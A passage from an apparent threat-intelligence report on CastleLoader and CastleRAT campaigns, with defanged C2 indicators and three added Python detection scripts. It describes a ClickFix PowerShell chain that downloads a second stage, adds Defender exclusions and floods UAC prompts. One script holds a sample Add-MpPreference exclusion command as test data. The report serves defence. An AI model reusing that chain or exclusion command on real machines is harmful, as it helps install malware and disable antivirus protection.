        <p>Within the document object model (DOM) of the website, Insikt Group identified two email addresses, one of which is likely a compromised account used to send phishing emails. At the time of discovery, the Rambler email address, likely a burner account, appeared within the page’s SMTP configuration together with its credentials, indicating its use as the primary sender account for automated bulk email delivery, consistent with the panel’s design for coordinated phishing or spam distribution. The DOM also contained an AWS access key.</p>
        <p>Additionally, the DOM referenced a set of domains, some of which are listed in <strong>Appendix D</strong>, while others were newly identified and are listed in <strong>Appendix E</strong>. By searching for the phrase “Сервис редиректов работает для [domain]” (translated as “The redirect service works for [domain]”), Insikt Group discovered further related domains, likewise shown in <strong>Appendix E</strong>.</p>
        <h5>Website 2: Email Manager (“Менеджер Email”)</h5>
        <p>The second website, <a href="https://urlscan.io/result/0199c9ff-89fc-7485-9c2c-d9124361dc00">hosted</a> on port 56724, closely resembles the first panel, “Redirect and Email Manager”, but exhibits several notable configuration differences (see <strong>Figure 18</strong>). These include a distinct AWS username, an SMTP sender address, <em>bred[@]booking-porta[.]com</em>, as well as different logging settings and a few additional indicators of compromise. Furthermore, the website specified <em>109[.]104[.]153[.]87</em> as its proxy server.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1dd3b5b946434f96299c400d804be3d2845722bc0.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1200" /><em><strong>Figure 18</strong>: Page linked to “Email Manager” tool (Source: Recorded Future)</em>
        </p>
        <h5>Website 3: Booking-Mailer V2.2 (“Менеджер Редиректов и рассылок”)</h5>
        <p>The third website, <a href="https://urlscan.io/result/0199c9ff-8cbc-7029-b6ab-dfcc24a26c96">hosted</a> on port 56725, features a substantially larger DOM and functions as a combined redirect generator and mass-mailing platform (see <strong>Figure 19</strong>). The user interface exposes key capabilities, including domain selection, subdomain base-name configuration, HTML email templating (supporting URL placeholders for generated redirects), target file uploads, worker/thread management, SMTP pool configuration and validation, proxy editing, and real-time logging and statistics. Redirects are constructed using a domain and base name to generate unique subdomain links following the format: <code>[identifier].[base_name].[main_domain]</code>.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1a869a94ae293e8228df02d97b7bb9de354345613.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1200" /><em><strong>Figure 19</strong>: Page linked to “Booking-Mailer V2.2” tool (Source: Recorded Future)</em>
        </p>
        <p>The domains <em>site-riko[.]com</em>, <em>site-sero[.]com</em>, <em>site-silo[.]com</em>, <em>site-tiko[.]com</em>, and <em>site-filo[.]com</em> are all referenced within the DOM.</p>
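<p>Redirect links built as <code>[identifier].[base_name].[main_domain]</code> leave a recognisable footprint in passive DNS: one base name under one main domain accumulating many distinct, random-looking leading labels. The following added example (not Insikt Group's code) groups hostnames by that pattern and flags such families; only the <em>site-*[.]com</em> main domains come from the DOM referenced above, while the base names, identifiers and benign hostnames are constructed.</p>

```python
"""Group hostnames of the form [identifier].[base_name].[main_domain] and flag
families with many distinct, random-looking identifiers, the shape of the
per-recipient redirect links the Booking-Mailer panel generates.

Added example, not Insikt Group's code. The main domains are the site-*.com
domains referenced in the panel's DOM; the base names, identifiers and benign
hostnames are constructed for illustration.
"""
import math
from collections import defaultdict
from typing import Dict, Iterable, List, Optional, Set, Tuple


def shannon_entropy(s: str) -> float:
    """Bits per character: eight distinct characters give 3.0, 'aaaa' gives 0.0."""
    if not s:
        return 0.0
    counts: Dict[str, int] = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_redirect_host(host: str) -> Optional[Tuple[str, str, str]]:
    """Return (identifier, base_name, main_domain) for a four-label hostname.
    main_domain is taken as the last two labels (naive eTLD+1, adequate for
    the .com domains in scope); anything else is not a candidate."""
    labels = host.strip().lower().rstrip(".").split(".")
    if len(labels) != 4 or not all(labels):
        return None
    return labels[0], labels[1], ".".join(labels[2:])


def find_redirect_families(hosts: Iterable[str], min_ids: int = 5,
                           min_entropy: float = 2.5) -> List[dict]:
    """Families are keyed by (base_name, main_domain). A family alerts when it
    has at least min_ids distinct identifiers whose mean entropy reaches
    min_entropy; set min_entropy to 0 if the identifiers are plain counters."""
    families: Dict[Tuple[str, str], Set[str]] = defaultdict(set)
    for h in hosts:
        parts = split_redirect_host(h)
        if parts:
            ident, base, main = parts
            families[(base, main)].add(ident)
    hits = []
    for (base, main), ids in families.items():
        mean_ent = sum(shannon_entropy(i) for i in ids) / len(ids)
        if len(ids) >= min_ids and mean_ent >= min_entropy:
            hits.append({"base_name": base, "main_domain": main,
                         "identifiers": len(ids), "mean_entropy": round(mean_ent, 2)})
    return sorted(hits, key=lambda f: (-f["identifiers"], f["main_domain"]))


# Constructed passive-DNS style observations: two redirect families on
# report-listed main domains and a benign three-host group that must not alert.
SAMPLE_HOSTS = [
    "x7q2m9k4.reservation.site-riko.com",
    "a3f8d1z0.reservation.site-riko.com",
    "p5w6n2r8.reservation.site-riko.com",
    "t9y1u4e7.reservation.site-riko.com",
    "b2c6h0j3.reservation.site-riko.com",
    "g4l8v1s5.reservation.site-riko.com",
    "k1d7s3m0.confirm.site-sero.com",
    "q8z2f5x9.confirm.site-sero.com",
    "n4j6b1t2.confirm.site-sero.com",
    "h3r9w5c7.confirm.site-sero.com",
    "e6v0y8l4.confirm.site-sero.com",
    "www.portal.example.com",
    "api.portal.example.com",
    "cdn.portal.example.com",
    "mail.example.com",
]

if __name__ == "__main__":
    for family in find_redirect_families(SAMPLE_HOSTS):
        print(f"{family['identifiers']} identifiers under "
              f"*.{family['base_name']}.{family['main_domain']} "
              f"(mean entropy {family['mean_entropy']})")
```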
        <p>Notably, within the “debug logs” in the DOM of the website, Insikt Group found a range of proxy servers with varying high ports. The IP addresses are listed in <strong>Table 1</strong>.</p>
        <div>
          <div>
            <div><strong>IP Address</strong></div>
            <div><strong>Ports</strong></div>
          </div>
          <div>
            <div>109[.]104[.]153[.]100</div>
            <div>11599, 12305, 13267, 13275</div>
          </div>
          <div>
            <div>109[.]104[.]153[.]193</div>
            <div>10324, 10616, 14195, 14196</div>
          </div>
          <div>
            <div>109[.]104[.]153[.]29</div>
            <div>13413, 14900</div>
          </div>
          <div>
            <div>109[.]104[.]154[.]67</div>
            <div>11264, 11860, 14100, 14122</div>
          </div>
        </div>
        <p><em><strong>Table 1</strong>: Proxy IP addresses found in DOM of “Booking-Mailer V2.2” tool (Source: Recorded Future)</em></p>
        <p>Insikt Group identified additional instances of the Phishing Email Management Tooling, all hosted on IP addresses announced by the same set of Autonomous Systems (ASes). The identified IP addresses are listed in <strong>Table 2</strong>. The domains hosted on these IP addresses are listed in <strong>Appendix H</strong>.</p>
        <div>
          <div>
            <div><strong>IP Address</strong></div>
            <div><strong>ASN</strong></div>
            <div><strong>Notes</strong></div>
          </div>
          <div>
            <div>85[.]208[.]84[.]65</div>
            <div>STIMUL-AS, RU (AS211659)</div>
            <div>
              <ul>
                <li>Certificate subject common name: <em>guesitastayhotel[.]com</em></li>
                <li>CastleRAT and Matanbuchus C2 servers identified within the same /24 range (<em>85[.]208[.]84[.]115</em> and <em>85[.]208[.]84[.]242</em>, respectively)</li>
              </ul>
            </div>
          </div>
          <div>
            <div>80[.]64[.]18[.]245</div>
            <div>STIMUL-AS, RU (AS211659)</div>
            <div>
              <ul>
                <li>Hosts hotel-themed domains</li>
              </ul>
            </div>
          </div>
          <div>
            <div>185[.]39[.]19[.]94</div>
            <div>OPTIMA-AS, RU (AS216341)</div>
            <div>
              <ul>
                <li>Certificate subject common name: <em>guesitastayhotel[.]com</em></li>
              </ul>
            </div>
          </div>
          <div>
            <div>88[.]214[.]50[.]83</div>
            <div>OPTIMA-AS, RU (AS216341)</div>
            <div>
              <ul>
                <li>Suspected testing server due to the number of domains including the keywords “test” and “demo”</li>
              </ul>
            </div>
          </div>
        </div>
        <p><em><strong>Table 2</strong>: Additional infrastructure instances of the Phishing Email Management Tooling (Source: Recorded Future)</em></p>
        <h5>ASN Cluster Possibly Linked to Bearhost</h5>
        <p>Insikt Group observed significant infrastructure activity associated with AS211659 (STIMUL-AS) and AS216341 (OPTIMA-AS) throughout this research. Both ASes were established on March 11, 2025, and have demonstrated consistent malicious activity since their inception. According to researchers at DeepCode, these providers <a href="https://decodecybercrime.com/bearhost-bulletproof-hosting-network-same-playbook-new-fronts/">maintain</a> strong links to the BEARHOST bulletproof hosting network, a known enabler of malicious cyber operations. BEARHOST and associated providers have reportedly serviced ransomware operations, including LockBit, Conti, and MedusaLocker, as well as sanctioned entities such as Garantex, Lazarus Group, Zservers, and Nobitex. That same research further identified malicious activity and customer bases linked to both AS211659 and AS216341, consistent with Insikt Group’s own observations of Lumma, Rhadamanthys, and Matanbuchus within these autonomous systems. This overlap in observed threats reinforces the assessment that both autonomous systems are part of a broader BEARHOST-aligned infrastructure ecosystem supporting financially motivated cyber operations.</p>
        <h5>Infrastructure Similarities with TAG-157 (RefBroker)</h5>
        <p>Insikt Group has previously reported on threat actors impersonating Booking.com, including TAG-157, also known as RefBroker. Notably, domains associated with TAG-157 have been observed hosted on IP address <em>77[.]83[.]207[.]56</em>, adjacent to <em>77[.]83[.]207[.]55</em>, with the latter being part of TAG-161’s infrastructure. More broadly, both TAG-157 and TAG-161 appear to favor the same set of ASNs discussed in the section <strong>ASN Cluster Possibly Linked to Bearhost</strong>. At present, however, the exact relationship between TAG-157 and TAG-161 remains unclear.</p>
        <h4>Cluster 3: Booking.com Impersonation Activity</h4>
        <p>Cluster 3 has been active since at least March 2025 and remains operational at the time of analysis. The cluster leverages infrastructure impersonating Booking.com, ClickFix techniques, and uses Steam Community pages as a dead drop resolver to deliver CastleRAT via CastleLoader. Although the techniques appear similar to those described in Cluster 2, Insikt Group has not identified any technical overlaps between Clusters 2 and 3 at this time.</p>
        <h5>Infrastructure Analysis</h5>
        <p>Insikt Group noted a CastleRAT <a href="https://tria.ge/250818-vhng4awks9/behavioral2">sample</a> that leveraged a Booking.com phishing domain, <em>update-info4468765[.]com</em> (see <strong>Figure 21</strong>). The phishing domain tricks users into running a malicious PowerShell command (via ClickFix techniques) that downloads a second-stage script from <em>boiksal[.]com/upd</em>. This script retrieves and executes a .NET loader that repeatedly spawns new PowerShell processes to add Windows Defender exclusions for the eventual payload (<code>update.exe</code>), using a User Account Control (UAC) prompt flooding loop to bypass analysis sandboxes and security controls. Once exclusions are applied, the loader decrypts and launches the CastleLoader payload, which then reaches out to its C2 domain, <em>programsbookss[.]com</em>, resolved through a Steam Community profile. The use of Steam Community profiles allows attackers to update infrastructure dynamically without redeploying malware (see <strong>Figure 20</strong>). CastleRAT samples that use Steam for dead drops may sometimes contain a hard-coded backup C2 in the event the dead drop C2 retrieval fails. A list of all observed Steam Community profiles and the various C2 domains observed on each is found in <strong>Appendix F</strong>.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_11fc64af5fa19c4f74249b006eab3899fe29a0281.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1493" />
        </p>
        <p><em><strong>Figure 20</strong>: GrayBravo’s CastleRAT using Steam Community for dead drop resolving (Source: Steam)</em></p>
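<p>The loader behaviour described above, one parent repeatedly spawning PowerShell to add Defender exclusions until a UAC prompt is accepted, is detectable from process-creation telemetry without knowing the payload in advance. The following added example (not Insikt Group's code) runs that logic over constructed Sysmon Event ID 1-style records; the loader path, user name and timestamps are invented, and <code>update.exe</code> is the payload name given in the report.</p>

```python
"""Detect one parent process repeatedly spawning PowerShell to add Windows
Defender exclusions, the behaviour the report describes for the Cluster 3
.NET loader that floods UAC prompts until an exclusion is accepted.

Added example, not Insikt Group's code. SAMPLE_EVENTS are constructed
process-creation records in the shape of Sysmon Event ID 1 fields; the loader
path, user name and timestamps are invented, and update.exe is the payload
name given in the report.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Add-MpPreference with any exclusion switch (path, process or extension).
EXCLUSION_CMD_RE = re.compile(
    r"add-mppreference\b.*?-exclusion(?:path|process|extension)\b", re.I)
# Value passed to the exclusion switch, double-quoted or bare.
EXCLUSION_ARG_RE = re.compile(
    r'-exclusion(?:path|process|extension)\s+(?:"([^"]+)"|(\S+))', re.I)


def is_exclusion_command(command_line: str) -> bool:
    return bool(EXCLUSION_CMD_RE.search(command_line))


def exclusion_targets(command_line: str) -> List[str]:
    """Every path/process/extension the command tries to exclude."""
    return [next(g for g in m.groups() if g)
            for m in EXCLUSION_ARG_RE.finditer(command_line)]


def detect_exclusion_flood(events: List[Dict], min_spawns: int = 3,
                           window: timedelta = timedelta(seconds=60)) -> List[Dict]:
    """Alert when one parent spawns >= min_spawns exclusion-adding PowerShell
    children inside a sliding window. A lone administrator running
    Add-MpPreference once does not trip it; the loader's retry loop does."""
    by_parent: Dict[tuple, List[Dict]] = defaultdict(list)
    for ev in events:
        if (ev["image"].lower().endswith("powershell.exe")
                and is_exclusion_command(ev["command_line"])):
            by_parent[(ev["host"], ev["parent_pid"], ev["parent_image"])].append(ev)

    alerts = []
    for (host, ppid, pimage), evs in by_parent.items():
        evs.sort(key=lambda e: e["utc_time"])
        start = 0
        for end in range(len(evs)):
            while evs[end]["utc_time"] - evs[start]["utc_time"] > window:
                start += 1
            if end - start + 1 >= min_spawns:
                targets = sorted({t for e in evs for t in exclusion_targets(e["command_line"])})
                alerts.append({"host": host, "parent_pid": ppid, "parent_image": pimage,
                               "spawn_count": len(evs), "first_seen": evs[0]["utc_time"],
                               "exclusions": targets})
                break  # one alert per parent
    return alerts


# ---- constructed telemetry -------------------------------------------------
T0 = datetime(2025, 8, 18, 14, 3, 0)
LOADER = r"C:\Users\jdoe\AppData\Local\Temp\loader.exe"   # invented path
PAYLOAD = r"C:\Users\jdoe\AppData\Roaming\update.exe"     # payload name from the report
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
ADD_EXCL = f'powershell.exe -Command Add-MpPreference -ExclusionPath "{PAYLOAD}"'


def _ev(offset_s: int, image: str, cmd: str, ppid: int, pimage: str,
        host: str = "WS-0042") -> Dict:
    return {"utc_time": T0 + timedelta(seconds=offset_s), "host": host, "image": image,
            "command_line": cmd, "parent_pid": ppid, "parent_image": pimage}


SAMPLE_EVENTS = [
    # five retries from the loader within eight seconds
    *[_ev(2 * i, PS, ADD_EXCL, 4812, LOADER) for i in range(5)],
    # benign: an administrator adds a single exclusion interactively
    _ev(300, PS, 'powershell.exe Add-MpPreference -ExclusionPath "D:\\Builds"', 1337, EXPLORER),
    # benign: unrelated PowerShell from the same shell
    _ev(310, PS, "powershell.exe Get-Process", 1337, EXPLORER),
]

if __name__ == "__main__":
    for a in detect_exclusion_flood(SAMPLE_EVENTS):
        print(f"{a['host']}: {a['parent_image']} (pid {a['parent_pid']}) spawned "
              f"{a['spawn_count']} exclusion attempts from {a['first_seen']}; "
              f"exclusions={a['exclusions']}")
```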
        <p>At the time of analysis, <em>update-info4468765[.]com</em> and <em>boiksal[.]com</em> were both hosted on <em>178[.]17[.]57[.]103</em>, while the Steam-resolved C2 domain, <em>programsbookss[.]com</em>, was hosted on an adjacent IP, <em>178[.]17[.]57[.]102</em>. This close placement within the same /24 subnet suggests that the operators likely acquired these IP addresses around the same time. It also suggests that they were assigned sequentially by the hosting provider, Global Connectivity Solutions (AS215540). A similar pattern was later observed across the <em>192[.]109[.]138[.]0/24</em> range, where Booking.com-themed phishing domains were hosted on <em>192[.]109[.]138[.]103</em> and the Steam-resolved C2 domains, <em>programsbookss[.]com</em> and <em>justnewdmain[.]com</em>, were hosted on <em>192[.]109[.]138[.]102</em>.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1b8336b05390165b9d107f8417922fed7d97dacc5.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1015" />
        </p>
        <p><em><strong>Figure 21</strong>: Booking.com-themed ClickFix linked to Cluster 3 (Source: Recorded Future)</em></p>
        <p>When scanned, the Booking.com-themed domains typically return either a Cloudflare-themed turnstile page or a “turnstile token missing” error message (<a href="https://pro.urlscan.io/result/0198f318-4860-7256-9c58-74307bfe89d0">1</a>, <a href="https://pro.urlscan.io/result/0198e28c-2350-7217-ad05-ebd6694c5fc2">2</a>). Further pivoting from the domain <em>boiksal[.]com</em> uncovered a broader cluster of activity encompassing multiple additional domains and IP addresses, most of which appear to be used to impersonate Booking.com. The domains and associated IP addresses are detailed in <strong>Appendix G</strong>. Notably, while the domains commonly use Cloudflare name servers, many of the domains ultimately resolve to threat actor–controlled IP addresses.</p>
        <h4>Cluster 4: Malvertising and Fake Software</h4>
        <p>Cluster 4 has been active since at least April 2025 and remains operational at the time of analysis. This cluster employs malvertising and fake software installers, impersonating legitimate tools such as Zabbix and RVTools, to distribute CastleLoader and NetSupport RAT.</p>
        <p>Based on Insikt Group observations, the cluster has used CastleLoader C2 infrastructure hosted on domains including <em>wereatwar[.]com</em>. It has also deployed NetSupport RAT samples that communicate with C2 servers at IP addresses such as <em>37[.]230[.]62[.]235</em> and <em>84[.]200[.]81[.]32</em>. Notably, the domain <em>jshanoi[.]com</em> resolved to these NetSupport-associated IP addresses during the period of activity.</p>
        <p>The CastleLoader payloads are distributed through fake GitHub repositories and delivered as electronically signed MSI installers, often bearing Extended Validation (EV) certificates, similar to those <a href="https://x.com/g0njxa/status/1980943290896630209/photo/3">observed</a> in previous Bumblebee campaigns. These signed builds have been attributed to organizations including LLC KHD GROUP (issued by GlobalSign) and INTYNA EXIM PRIVATE LIMITED (issued by SSL.com), among others. Notably, “Sparja”, an Exploit Forum user discussed below and potentially linked to CastleLoader, has been active in discussions regarding EV certificates earlier this year.</p>
        <h3>Possible Connection to Exploit Forum User Sparja</h3>
        <p>Analysis of <a href="https://tria.ge/250520-yvkthsbr2s">historical</a> CastleLoader infrastructure identified one anomalous instance that may indicate a link to a threat actor named “Sparja”. A panel hosted on <em>94[.]159[.]113[.]123</em> and exposed on port 5050 diverged from established CastleLoader panel characteristics. While known CastleLoader administrative interfaces typically display the HTML title “Castle,” this instance returned the title “Sparja.” Review of the panel’s DOM file revealed that it referenced a CSS file with a filename identical to one observed in verified CastleLoader panels. While the overlap does not constitute a conclusive stylistic correlation, it may suggest code reuse or reliance on a shared panel template between CastleLoader and the “Sparja” interface. Insikt Group identified one other Sparja panel with the same HTML title on the IP address <em>94[.]159[.]113[.]32</em> (see <strong>Figure 22</strong>).</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1694a57896b2a72600c74c531634a7f93ce34875f.png?width=750&amp;format=png&amp;optimize=medium" width="1258" height="272" />
        </p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_158f591d974d66fb741ee6789a74a8c861cd0c09f.png?width=750&amp;format=png&amp;optimize=medium" width="1258" height="272" />
        </p>
        <p><em><strong>Figure 22:</strong></em> <em>Sparja panel (top) and CastleLoader panel (bottom) (Source: Recorded Future)</em></p>
        <p>Activity associated with the alias “Sparja” on the underground Exploit Forum provides additional context for possible connections. Based on information obtained via proprietary means, Insikt Group assesses that Sparja is also active on the top-tier Russian-language forum XSS. Insikt Group bases this assessment on the user’s XSS activity, in which the user viewed similar topics related to malware loaders, EV certificates, and bypass software.</p>
        <p>On December 22, 2024, Sparja authored a thread on Exploit Forum, looking to buy or rent a dropper (see <strong>Figure 23</strong>). In a documented dispute spanning from January to February 2025, Sparja engaged a user known as “ppro” to develop a “private solution, a dropper or loader for an executable file.” The dispute concluded with ppro’s ban from the forum, following a history of earlier account suspensions and reinstatements. Given the timeline of the events, Insikt Group assesses it is unlikely ppro had involvement in CastleLoader’s development; however, Sparja’s expressed interest in acquiring a custom loader prior to CastleLoader’s appearance supports the assessment that Sparja was actively pursuing dropper or loader functionality consistent with CastleLoader’s purpose.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1c30437beb16bf10e993ab55c126b207e27dcf839.png?width=750&amp;format=png&amp;optimize=medium" width="767" height="529" />
        </p>
        <p><em><strong>Figure 23:</strong></em> <em>Sparja in search of a dropper or loader on Exploit Forum (Source: Recorded Future)</em></p>
        <p>Forum discussions in October 2025 indicate continued interest in Sparja’s apparent tooling (see <strong>Figure 24</strong>). A subsequent post sought contact with “the coder who wrote the Sparja dropper,” implying that a distinct dropper associated with Sparja had circulated within the underground market. This activity’s timeline aligns with CastleLoader operations and suggests that Sparja’s development or procurement of loader-type malware was known among peers during the same operational period.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_19420a3499ba40af372c0899cb96c5e2a7642dac2.png?width=750&amp;format=png&amp;optimize=medium" width="983" height="367" /><em><strong>Figure 24:</strong></em> <em>Exploit Forum user “tomri99le” looking for the coder that worked with Sparja (Source: Recorded Future)</em>
        </p>
        <p>A <a href="https://tria.ge/250520-yvkthsbr2s/behavioral1">related</a> CastleLoader sample, distributed as an MSI installer, was <a href="https://bazaar.abuse.ch/sample/8f3fc820def7b492876b38d021c904aafc60c379e8ad58cac81eee05bf41ee77/">identified</a> in Bazaar Abuse data as originating from the GitHub account <em>github[.]com/legend123451111</em>. The same account appears in a Cisco Talos <a href="https://blog.talosintelligence.com/maas-operation-using-emmenhtal-and-amadey-linked-to-threats-against-ukrainian-entities/">report</a> describing a malware-as-a-service (MaaS) ecosystem leveraging GitHub for payload distribution, including malware families such as Amadey and Emmenhtal. Talos noted consistent naming conventions, repository structures, and file types across multiple associated GitHub accounts, with the earliest activity dated to January 2025. The report concluded that the operators of these accounts likely facilitated multi-tenant malware distribution rather than single-threat actor campaigns.</p>
        <p>The available evidence does not confirm that Sparja directly participated in the MaaS network described by Talos; however, the CastleLoader sample that originated from <em>github[.]com/legend1234561111</em>, which contained the MSI installer, is linked to the Sparja-named CastleLoader panel, indicating a potential overlap between the GitHub-based distribution channel and infrastructure associated with Sparja. This connection suggests that Sparja may have either used an existing MaaS framework to distribute CastleLoader payloads or operated within the same delivery ecosystem.</p>
        <p>On October 27, 2025, Sparja posted a comment on Exploit Forum within a thread advertising eDragon_x’s dropper service, stating that they had been using the service for several months and considered the dropper reliable. This post is notable as it reinforces Sparja’s continued interest in droppers and loaders, a recurring theme in their activity. The post also situates Sparja in proximity to eDragon_x, a threat actor operating within overlapping underground circles that include “tramp”, a known threat actor <a href="https://www.cyberdaily.au/security/11791-black-basta-ransomware-leader-slips-away-from-courtroom">reportedly</a> identified as Oleg Nefedov. Tramp is associated with a spamming network responsible for <a href="https://x.com/PRODAFT/status/1892636346885235092">distributing</a> Qbot (aka Qakbot) and is identified as the founder of the BlackBasta ransomware group. Tramp was also an affiliate for several ransomware operations, such as REvil and Conti; he also maintained close ties with Rhysida and Cactus.</p>
        <p>While there is no direct evidence of collaboration between Sparja and tramp, the shared participation across related forums and service providers like eDragon_x suggests that Sparja operates within a network of threat actors closely associated with major ransomware distribution and loader development ecosystems.</p>
        <h3>Victimology</h3>
        <p>Insikt Group identified numerous suspected victim IP addresses communicating with the Tier 1 C2 infrastructure associated with CastleRAT. While the majority of these IP addresses appear to be geolocated in the United States, only a limited number of actual victims could be positively identified. Most victims remain unidentified and cannot be confirmed; however, Insikt Group assesses it is likely that at least some of them represent private individuals who became infected. It is important to note that, for the entities Insikt Group did identify, the infection may have occurred on individual machines within the victim organization's network, or on devices using the victim's WiFi, rather than on the organization's systems directly. For instance, in the university context, it is likely that some victims are individual machines, such as those used by students, connected to the university's network.</p>
        <h2>Mitigations</h2>
        <ul>
          <li>Leverage the IoCs in <strong>Appendix H</strong> to investigate potential past or ongoing infections, both successful and attempted, and use the Recorded Future Intelligence Cloud to monitor for future IoCs associated with GrayBravo (formerly tracked as TAG-150), TAG-160, TAG-161, and other threat actors.</li>
          <li>Monitor for validated infrastructure associated with the malware families discussed in this report, including CastleLoader, CastleRAT, Matanbuchus, and numerous others identified and validated by Insikt Group, and integrate these indicators into relevant detection and monitoring systems.</li>
          <li>Leverage Sigma, YARA, and Snort rules provided in <strong>Appendices I</strong>, <strong>J</strong>, <strong>K</strong>, <strong>L</strong>, <strong>M</strong>, <strong>N</strong>, and <strong>O</strong> in your SIEM or endpoint detection and response (EDR) tools to detect the presence or execution of CastleLoader, CastleRAT, and Matanbuchus. Additionally, use other detection rules available in the Recorded Future Intelligence Cloud.</li>
          <li>Use Recorded Future Network Intelligence to detect instances of data exfiltration from your corporate infrastructure to known malicious infrastructure. This can be achieved by employing specific queries and filtering the results based on your assets.</li>
          <li>Use the Recorded Future Intelligence Cloud to monitor GrayBravo, TAG-160, TAG-161, other threat actors, and the broader cybercriminal ecosystem, ensuring visibility into the latest tactics, techniques, and procedures (TTPs), preferred tools and services (for example, specific threat activity enablers [TAEs] used by threat actors), and emerging developments.</li>
          <li>Use Recorded Future AI’s reporting feature to generate tailored reports on topics that matter to you. For example, if you want to stay informed about activities related to specific personas such as Sparja, you can receive regular AI-generated updates on this threat actor’s activity on Exploit Forum.</li>
        </ul>
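        <p>The appendices below publish indicators in defanged form (<em>domain[.]tld</em>, <em>1[.]2[.]3[.]4</em>, with "Cloudflare" or "N/A" where no address resolved) together with first-seen and last-seen dates. The following script is an added example, not part of the Recorded Future report: it refangs rows in that table layout, matches DNS and proxy log lines against them (exact domain, subdomain, or IP), and tags each hit with whether the event falls inside the indicator's observed window. The indicator rows, log lines and log format are constructed placeholders.</p>

```python
"""
Match defanged IoC rows (the appendix layout used in this report) against
DNS and proxy log lines.  Added example; every indicator and log line
below is a constructed placeholder, not a value from the report.
"""
import ipaddress
import re
from dataclasses import dataclass
from datetime import date, datetime
from typing import Optional

# Constructed rows in the appendix layout: domain, IP, first seen, last seen.
# "Cloudflare" and "N/A" mirror the report's tables where no IP was resolved.
IOC_ROWS = [
    ("loader-c2-example[.]invalid", "203[.]0[.]113[.]10", "2025-10-09", "2025-11-05"),
    ("freight-example[.]invalid", "Cloudflare", "2025-09-19", "2025-11-09"),
    ("stay-verify-example[.]invalid", "N/A", "N/A", "N/A"),
]

# Constructed log lines in a hypothetical "<ts> <source> client=<ip> query|dst=<target>" format.
LOG_LINES = [
    "2025-10-20T10:15:02Z dns client=10.0.0.5 query=cdn.loader-c2-example.invalid type=A",
    "2025-10-20T10:16:00Z dns client=10.0.0.5 query=www.example.com type=A",
    "2025-12-01T08:00:00Z proxy client=10.0.0.7 dst=203.0.113.10:443 method=CONNECT",
    "2025-10-01T09:30:00Z proxy client=10.0.0.9 dst=stay-verify-example.invalid:443 method=CONNECT",
]

DEFANG_DOT = re.compile(r"\[\.\]|\(\.\)|\{\.\}")


def refang(value: str) -> str:
    """Turn a defanged indicator ("[.]", "hxxp", "[:]") back into its real form."""
    value = DEFANG_DOT.sub(".", value.strip())
    value = re.sub(r"^hxxp(s?)://", r"http\1://", value, flags=re.IGNORECASE)
    return value.replace("[:]", ":").lower()


def parse_date(value: str) -> Optional[date]:
    """Appendix dates are ISO dates or "N/A" (unknown)."""
    return None if value.strip().upper() == "N/A" else date.fromisoformat(value.strip())


@dataclass(frozen=True)
class Indicator:
    domain: str
    ip: Optional[str]
    first_seen: Optional[date]
    last_seen: Optional[date]


def load_indicators(rows) -> list:
    """Refang each row; non-IP values such as "Cloudflare" leave ip=None."""
    out = []
    for domain, ip_text, first, last in rows:
        ip = None
        try:
            ip = str(ipaddress.ip_address(refang(ip_text)))
        except ValueError:
            pass  # "Cloudflare" / "N/A": no usable address, keep the domain only
        out.append(Indicator(refang(domain), ip, parse_date(first), parse_date(last)))
    return out


LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<source>dns|proxy) client=(?P<client>\S+) (?:query|dst)=(?P<target>\S+)"
)


def split_host_port(target: str):
    """'host:443' -> ('host', 443); a bare host or IP keeps port None."""
    host, _, port = target.rpartition(":")
    if host and port.isdigit():
        return host.lower(), int(port)
    return target.lower(), None


def in_window(when: date, ind: Indicator) -> Optional[bool]:
    """True/False if the event falls inside first..last seen; None if unknown."""
    if ind.first_seen is None or ind.last_seen is None:
        return None
    return ind.first_seen <= when <= ind.last_seen


def match_line(line: str, indicators) -> Optional[dict]:
    """Return a hit dict for the first indicator the line touches, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    host, _port = split_host_port(m["target"])
    when = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").date()
    for ind in indicators:
        if host == ind.domain:
            kind = "domain"
        elif host.endswith("." + ind.domain):
            kind = "subdomain"  # e.g. cdn.<c2 domain>
        elif ind.ip is not None and host == ind.ip:
            kind = "ip"
        else:
            continue
        return {"client": m["client"], "source": m["source"], "target": host,
                "indicator": ind.domain, "match": kind, "in_window": in_window(when, ind)}
    return None


def scan(lines, indicators) -> list:
    """Run every log line through match_line and keep the hits, in order."""
    return [hit for hit in (match_line(line, indicators) for line in lines) if hit]


if __name__ == "__main__":
    for hit in scan(LOG_LINES, load_indicators(IOC_ROWS)):
        print(hit)
```

An event outside the observed window (or against an indicator with unknown dates) is still worth triage; the flag only helps prioritise, since sinkholed or re-used infrastructure can produce true contacts after the last-seen date.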
        <h2>Outlook</h2>
        <p>As anticipated in earlier assessments, GrayBravo has significantly expanded its user base, evidenced by the growing number of threat actors and operational clusters leveraging its CastleLoader malware. This trend highlights how technically advanced and adaptive tooling, particularly from a threat actor with GrayBravo’s reputation, can rapidly proliferate within the cybercriminal ecosystem once proven effective. Given GrayBravo’s established history of developing and deploying custom malware families, it is highly likely the group will continue to release new tools and capabilities in the near term, further strengthening its position within the MaaS market.</p>
        <p>Among observed activity clusters, TAG-160 stands out for its highly targeted campaigns against the logistics sector. The cluster demonstrates a deep understanding of industry operations, impersonating legitimate logistics firms, exploiting freight-matching platforms, and mirroring authentic communications to enhance its deception and impact. This indicates an increasing sophistication among niche, sector-specific threat actors who maintain a low profile through minimal footprints and precise targeting.</p>
